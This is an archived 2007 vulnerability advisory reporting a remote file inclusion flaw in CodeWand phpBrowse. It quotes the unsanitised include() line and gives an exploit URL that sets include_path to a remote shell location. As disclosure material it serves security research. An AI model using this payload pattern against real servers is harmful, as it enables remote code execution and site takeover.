CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16666
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description

PhpBrowse


Found by kezzap66345 *


Script: http://www.codewand.org/download/phpBrowse.tar.gz


ERROR: /include/include_stream.inc.php

include($include_path . "style.inc.php"); <<< rfi coded






RFI:

http://SITE.com/path/include/include_stream.inc.php?include_path=[SHELL]






kezzap66345[at]hotmail[dot]com

*thanx=x0r0nstr0ke*shikaSiircicocuk******

milw0rm.com [2007-04-05]